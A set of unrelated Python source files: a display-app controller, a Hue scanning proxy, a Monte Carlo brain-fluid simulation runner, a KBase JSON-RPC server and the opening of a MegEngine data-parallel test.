self.controller_thread = threading.Thread(target=self.run)
self.controller_thread.daemon = True
self.controller_thread.start()
def stop(self):
"""
Stop a running controller
"""
if self.controller_thread is not None:
self.stop_event.set()
self.controller_thread.join()
self.controller_thread = None
def get_state(self):
"""
Controller function to retrieve the app state
"""
return self.main_app().get_state()
def get_screen_order(self):
"""
Controller function to retrieve screen order
"""
return self.main_app().screen_order
def set_screen_order(self, screen_order):
"""
Controller function to set screen order
"""
self.main_app().screen_order = screen_order
return True
def save_screen_order(self, screen_order):
"""
Controller function to set and save screen order
"""
self.main_app().screen_order = screen_order
self.main_app().save_screen_order(self.main_app().config_directory, screen_order)
return True
def get_config(self):
"""
Controller function to retrieve configuration
"""
return self.main_app().config
def set_config(self, config):
"""
Controller function to set configuration
"""
self.main_app().config = config
self.main_app().reload_running_app()
return True
def save_config(self, config):
"""
Controller function to set and save configuration
"""
self.main_app().config = config
self.main_app().reload_running_app()
self.main_app().save_system_config(self.main_app().config_directory, config)
return True
def send_input_event(self, input_event):
"""
Controller function to inject an input event
"""
return self.main_app().on_input_event(input_event)
def send_joystick_press(self, button, button_states):
"""
Controller function to inject a joystick button press
"""
return self.main_app().on_joystick_press(button, button_states)
def send_joystick_release(self, button, button_states):
"""
Controller function to inject a joystick button release
"""
return self.main_app().on_joystick_release(button, button_states)
def send_joystick_axis(self, axis_states):
"""
Controller function to inject joystick axis data
"""
return self.main_app().on_joystick_axis(axis_states)
def enter_sleep_mode(self):
"""
Controller function to turn off the LED display
"""
self.main_app().enter_sleep_mode()
def run(self):
"""
Main controller run routine, to be implemented by the controller
"""
return
|
scanning_proxy.py | """Philips hue proxy code."""
import abc
import logging
import sys
import threading
from pi import proxy
class ScanningProxy(proxy.Proxy):
    """A proxy object with a background scan thread.

    ``_scan_once()`` is invoked once at startup and then every
    ``refresh_period`` seconds — or immediately when ``scan()`` is
    called — until ``stop()`` is requested.
    """
    __metaclass__ = abc.ABCMeta

    def __init__(self, refresh_period):
        self._refresh_period = refresh_period
        self._exiting = False
        self._scan_thread_condition = threading.Condition()
        self._scan_thread = threading.Thread(
            target=self._scan, name='%s thread' % self.__class__.__name__)
        self._scan_thread.daemon = True
        self._scan_thread.start()

    @proxy.command
    def scan(self):
        """Wake the scan thread so it performs an immediate rescan."""
        with self._scan_thread_condition:
            self._scan_thread_condition.notify()

    def _scan(self):
        """Loop thread for scanning."""
        while not self._exiting:
            # We always do a scan on start up.
            try:
                self._scan_once()
            # BUG FIX: the original bare ``except:`` also swallowed
            # SystemExit and KeyboardInterrupt; catch Exception so the loop
            # stays best-effort without masking interpreter-exit signals.
            except Exception:
                logging.error('Error during %s scan', self.__class__.__name__,
                              exc_info=sys.exc_info())
            with self._scan_thread_condition:
                if self._exiting:
                    break
                else:
                    # Sleep until the next periodic scan or an explicit notify.
                    self._scan_thread_condition.wait(self._refresh_period)
        logging.info('Exited %s scan thread', self.__class__.__name__)

    @abc.abstractmethod
    def _scan_once(self):
        """Perform one scan pass; implemented by concrete proxies."""
        pass

    def stop(self):
        """Ask the scan thread to exit and wake it up."""
        with self._scan_thread_condition:
            self._exiting = True
            self._scan_thread_condition.notify()

    def join(self):
        """Block until the scan thread has exited."""
        self._scan_thread.join()
|
monte_carlo.py | """!
@file
@date 07 Jun 2015
@license
Copyright 2015 Brett Tully
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Select the MPET solver implementation: either the pure-python solver from
# ``mpet.four_compartment`` or the compiled ``mpet`` extension classes.
__use_python_solver = True
if __use_python_solver:
    from mpet.four_compartment import FourCompartmentMPET as MPETSolver
else:
    from mpet import FourCompartmentPoro as MPETSolver
    from mpet import FourCompartmentPoroOptions
    from mpet import FourCompartmentPoroResult
import numpy as np
import csv
import multiprocessing as mp
class MonteCarloWorker(object):
    """Runs many randomized MPET simulations in parallel.

    Worker processes each run a share of the simulations and push one
    parameter/result row per simulation onto an output queue; a single
    writer process streams the rows to a CSV file.
    """
    _STOP_SIGNAL = "STOP"

    def __init__(self, num_simulations=10000, blocked=False):
        self._num_simulations = num_simulations
        self._grid_size = 1500  # from resolution study
        self._num_steps = 3  # from resolution study
        secs_in_day = 86400.0
        self._initial_time = 0.0
        self._dt = secs_in_day / self._num_steps
        self._write_transient = False
        self._write_wall = False
        self._debug_print = False
        # A blocked aqueduct is modelled with a much smaller diameter.
        self._aqueduct_diameter = 0.25e-3 if blocked else 4e-3
        self._base_name = "monte_carlo"
        if blocked:
            self._base_name += "_blocked"
        self._out_filename = self._base_name + ".dat"
        self._out_csvfile = None
        self._num_procs = None
        self._num_simulations_per_proc = None
        self._run_q = None
        self._out_q = None
        self._out_p = None
        self._run_p = None

    def create_data(self, num_procs=None):
        """
        Run a series of simulations. As this is embarrasingly parallel
        we can use python multiprocess to compute them in parallel. The
        results of a run are pushed to the output queue to be written to
        file
        """
        self._num_procs = mp.cpu_count() if num_procs is None else num_procs
        # Floor division: behaves the same as the old `/` under Python 2
        # and stays an int under Python 3.
        self._num_simulations_per_proc = self._num_simulations // self._num_procs + 1
        self._run_q = mp.Queue()
        self._out_q = mp.Queue()
        self._run_p = [mp.Process(target=self._run_all, args=()) for i in range(self._num_procs)]
        self._out_p = mp.Process(target=self._output, args=())
        for p in self._run_p:
            p.start()
        self._out_p.start()
        for p in self._run_p:
            p.join()
        self._out_p.join()

    def load_results(self):
        """
        Open the output file and convert it to a numpy array ready for
        analysis
        """
        return np.loadtxt(self._out_filename, delimiter=',')

    def _run_all(self):
        """
        Runs all of the simulations, creating a unique id for each one
        """
        cur_proc = mp.current_process()._identity[0] - 1
        for i in range(self._num_simulations_per_proc):
            sim_idx = cur_proc * self._num_simulations_per_proc + i
            result = self._run(sim_idx)
            self._out_q.put(result)
        # Fix: exactly ONE sentinel per worker. The writer consumes one
        # sentinel per worker (num_procs total). The original pushed
        # num_procs sentinels from *every* worker, so the writer could see
        # all its sentinels from the first worker to finish and exit early,
        # dropping the remaining workers' results.
        self._out_q.put(self._STOP_SIGNAL)

    def _output(self):
        """
        Take the results from each run and save it to file
        """
        with open(self._out_filename, "w") as outfile:
            self._out_csvfile = csv.writer(outfile)
            # Keep running until every worker has sent its stop sentinel.
            for works in range(self._num_procs):
                for result in iter(self._out_q.get, self._STOP_SIGNAL):
                    self._out_csvfile.writerow(result)

    def _run(self, sim_number):
        """Run one simulation with randomized parameters.

        Returns a flat row: the 11 sampled parameters followed by the 5
        solver results, in the column order expected by main().
        """
        base_name = "{}_{:06d}".format(self._base_name, sim_number + 1)
        print(base_name)  # progress marker (was a Python-2-only print statement)
        opts = FourCompartmentPoroOptions()
        # arteriol constants
        opts.alpha_a = np.random.uniform(0.8, 1.0)
        opts.beta_a = 0.99
        opts.kappa_a = 10 ** np.random.uniform(-14.0, -8.0)
        opts.mu_a = 8.9e-4 * 3.  # about 3 times that of water
        # capillary constants
        opts.alpha_c = np.random.uniform(0.8, 1.0)
        opts.beta_c = 0.99
        opts.kappa_c = 10 ** np.random.uniform(-14.0, -8.0)
        opts.mu_c = 8.9e-4 * 3.  # about 3 times that of water
        opts.k_ce = 10 ** np.random.uniform(-10.0, 0.0)
        # venous constants
        opts.alpha_v = np.random.uniform(0.8, 1.0)
        opts.beta_v = 0.99
        opts.kappa_v = 10 ** np.random.uniform(-14.0, -8.0)
        opts.mu_v = 8.9e-4 * 3.  # about 3 times that of water
        # transfer coefficients
        opts.gamma_ac = 10 ** np.random.uniform(np.log10(3.0e-19), np.log10(1.0e-19))
        opts.gamma_ce = 10 ** np.random.uniform(-20, np.log10(2.5e-19))
        opts.gamma_cv = 10 ** np.random.uniform(-20, np.log10(2.5e-19))
        opts.gamma_ev = 10 ** np.random.uniform(-13.0, -8.0)
        # aqueduct diameter
        opts.aqueduct_diameter = self._aqueduct_diameter
        s = MPETSolver(self._grid_size,
                       self._initial_time,
                       self._num_steps,
                       self._dt,
                       self._write_transient,
                       self._write_wall,
                       self._debug_print,
                       base_name,
                       opts)
        result = s.solve()
        assert isinstance(result, FourCompartmentPoroResult)
        return [opts.alpha_a,
                opts.alpha_c,
                opts.alpha_v,
                opts.kappa_a,
                opts.kappa_c,
                opts.kappa_v,
                opts.k_ce,
                opts.gamma_ac,
                opts.gamma_ce,
                opts.gamma_cv,
                opts.gamma_ev,
                result.displacement,
                result.pressure_art,
                result.pressure_cap,
                result.pressure_csf,
                result.pressure_ven]
def main():
    """Run (or reload) the Monte Carlo study and plot every parameter
    against every result in a grid of scatter plots."""
    from mpl_toolkits.mplot3d import Axes3D  # needed to register projection
    import matplotlib.pyplot as plt

    total_runs = int(1e6)
    worker = MonteCarloWorker(num_simulations=total_runs, blocked=False)
    rerun_simulations = True
    if rerun_simulations:
        worker.create_data(num_procs=3)
    results = worker.load_results()

    # Column layout of a result row: 11 parameters then 5 results.
    param_names = ["alpha_a", "alpha_c", "alpha_v",
                   "kappa_a", "kappa_c", "kappa_v",
                   "k_ce",
                   "gamma_ac", "gamma_ce", "gamma_cv", "gamma_ev"]
    result_names = ["Displacement",
                    "Pressure: Art",
                    "Pressure: Cap",
                    "Pressure: CSF",
                    "Pressure: Ven"]
    num_params = len(param_names)
    num_results = len(result_names)
    assert num_params == 11
    assert num_results == 5
    assert results.shape[1] == num_params + num_results

    fig = plt.figure()
    for col, param_title in enumerate(param_names):
        for row, result_title in enumerate(result_names):
            ax = fig.add_subplot(num_results, num_params,
                                 row * num_params + col + 1)
            # alpha parameters are sampled linearly, everything else
            # log-uniformly, so pick the matching x-axis scale.
            draw = ax.plot if param_title.startswith("alpha") else ax.semilogx
            draw(results[:, col], results[:, row + num_params], 'o')
            ax.grid()
            if row == 0:
                ax.set_title(param_title)
            if col == 0:
                ax.set_ylabel(result_title)
    plt.show()


if __name__ == "__main__":
    main()
|
ContigFilter_mleeServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ContigFilter_mlee.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Path of the KBase deployment config file, or None if unset."""
    return environ.get(DEPLOY)
def get_service_name():
    """Service name from the environment, or None if unset."""
    return environ.get(SERVICE)
def get_config():
    """Parse this service's section of the deployment config into a dict,
    or return None when no config file is configured."""
    cfg_path = get_config_file()
    if not cfg_path:
        return None
    parser = ConfigParser()
    parser.read(cfg_path)
    section = get_service_name() or 'ContigFilter_mlee'
    return {name: value for name, value in parser.items(section)}
config = get_config()
from ContigFilter_mlee.ContigFilter_mleeImpl import ContigFilter_mlee # noqa @IgnorePep8
impl_ContigFilter_mlee = ContigFilter_mlee(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also serializes sets, frozensets and any object
    exposing a toJSONable() method."""

    def default(self, obj):
        # Sets of either flavour become plain lists.
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects may provide their own JSON-able representation.
        to_jsonable = getattr(obj, 'toJSONable', None)
        if to_jsonable is not None:
            return to_jsonable()
        # Fall through to the default (raises TypeError).
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSON-RPC service that injects a MethodContext as the first argument
    of every registered method (the stock jsonrpcbase service does not)."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # The `- 1` offsets account for the ctx argument injected
                # server-side, which is not counted in the wire params.
                # Does it have enough arguments?
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')

                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError

                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Wrap any non-JSONRPC exception in a server error carrying the
            # traceback so the caller sees a structured failure.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        #        try:
        #            rdata = json.loads(jsondata)
        #        except ValueError:
        #            raise ParseError

        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)

            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch: validate/fill every request first, then run them.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)

            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)

            if responds:
                return responds

            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        # Validate declared param types (registered via add(..., types=...)).
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])

        result = self._call_method(ctx, request)

        # Do not respond to notifications.
        if request['id'] is None:
            return None

        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']

        return respond
class MethodContext(dict):
    """Per-call context (a dict subclass) holding caller identity, method
    info and provenance, and proxying log calls to the service logger."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Symbolic and numeric levels accepted verbatim by log_debug().
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        # Levels already in _debug_levels pass through unchanged; numeric
        # levels 1-3 are mapped to logger levels 7-9.
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Tag every message with the per-request call metadata.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        # Fetch provenance from the SDK callback server when one is
        # configured; otherwise fall back to the locally stored provenance.
        # NOTE: ServerError is defined later in this module; it is resolved
        # at call time, so the forward reference is safe.
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        # Fix: the original called super(Exception, self).__init__, which
        # skips Exception in the MRO and dispatches to BaseException.
        # Initialize through this class, as intended.
        super(ServerError, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        self.data = data or error or ''
        # data = JSON RPC 2.0, error = 1.1

    def __str__(self):
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data
def getIPAddress(environ):
    """Best-effort client IP: honour proxy headers unless the deployment
    config explicitly says not to trust them."""
    forwarded = environ.get('HTTP_X_FORWARDED_FOR')
    real_ip = environ.get('HTTP_X_REAL_IP')
    # X-headers are trusted unless the config opts out.
    distrust = config is not None and \
        config.get('dont_trust_x_ip_headers') == 'true'
    if not distrust:
        if forwarded:
            # First hop of a comma-separated proxy chain.
            return forwarded.split(',')[0].strip()
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        # Keep the server log writing to the same file after the user log
        # rotates/changes its file.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        # Log a message tagged with the per-request call context.
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'ContigFilter_mlee'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # method name -> 'required' / 'optional' / 'none' auth requirement
        self.method_authentication = dict()
        self.rpc_service.add(impl_ContigFilter_mlee.run_ContigFilter,
                             name='ContigFilter_mlee.run_ContigFilter',
                             types=[dict])
        self.method_authentication['ContigFilter_mlee.run_ContigFilter'] = 'required'  # noqa
        self.rpc_service.add(impl_ContigFilter_mlee.run_ContigFilter_max,
                             name='ContigFilter_mlee.run_ContigFilter_max',
                             types=[dict])
        self.method_authentication['ContigFilter_mlee.run_ContigFilter_max'] = 'required'  # noqa
        self.rpc_service.add(impl_ContigFilter_mlee.status,
                             name='ContigFilter_mlee.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # WSGI entry point: parse the JSON-RPC request, authenticate,
        # dispatch, and serialize the response (or a structured error).
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'

        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'ContigFilter_mlee ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                # An invalid token is fatal only when auth
                                # is required; 'optional' proceeds anonymous.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())

        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))

        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''

        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]

    def process_error(self, error, context, request, trace=None):
        # Shape the error structure according to the JSON-RPC version the
        # request advertised (1.1 'version', 2.0 'jsonrpc', or legacy 1.0),
        # attaching the id and the stack trace where each version expects it.
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)

    def now_in_utc(self):
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        # Local time ISO string with the local UTC offset appended.
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

# Handle to the background server process started by
# start_server(newprocess=True); None while no server is running.
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Excecution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    bound_port = httpd.server_address[1]
    print("Listening on port %s" % bound_port)
    if not newprocess:
        # Runs forever in this thread; the return below is only reached
        # in newprocess mode.
        httpd.serve_forever()
    else:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    return bound_port
def stop_server():
    # Terminate the background server started with start_server(newprocess=True).
    # NOTE: assumes a server is running; calling this when _proc is None
    # raises AttributeError.
    global _proc
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Execute one JSON-RPC call read from a file and write the response.

    Used by the async job runner. Returns 0 on success, 500 when the
    response carries an error structure.
    """
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    # Fill in defaults the CLI caller may omit.
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        # Dispatch through the same RPC service the WSGI handler uses.
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Async-CLI mode: script.py <input.json> <output.json> [token|token-file]
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            # Third argument is either a token file or a literal token.
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    # Server mode: optional --port / --host flags.
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"

    start_server(host=host, port=port)
#    print("Listening on port %s" % port)
#    httpd = make_server( host, port, application)
#
#    httpd.serve_forever()
|
test_dp_correctness.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import os
import platform
import re
import subprocess
import sys
from math import ceil
import numpy as np
import pytest
import megengine as mge
import megengine.autodiff as ad
import megengine.distributed as dist
import megengine.functional as F
from megengine.device import get_default_device, set_default_device
from megengine.distributed.helper import get_device_count_by_fork
from megengine.functional.debug_param import set_conv_execution_strategy
from megengine.module import AvgPool2d, BatchNorm2d, Conv2d, Linear, Module
from megengine.optimizer import SGD
from megengine.tensor import Tensor
p_num = 4
def get_gpu_name():
    """Return the first GPU's name via nvidia-smi, or "None" if unavailable."""
    try:
        gpu_info = subprocess.check_output(
            ["nvidia-smi", "--query-gpu=gpu_name", "--format=csv,noheader"]
        )
        gpu_info = gpu_info.decode("ascii").split("\n")[0]
    except Exception:
        # Fix: was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit; only ordinary failures (missing
        # binary, non-zero exit, decode errors) mean "no GPU".
        gpu_info = "None"
    return gpu_info
def get_cpu_name():
    """Return the CPU model name from /proc/cpuinfo, or "None" on failure."""
    cpu_info = "None"
    try:
        cpu_info = subprocess.check_output(["cat", "/proc/cpuinfo"]).decode("ascii")
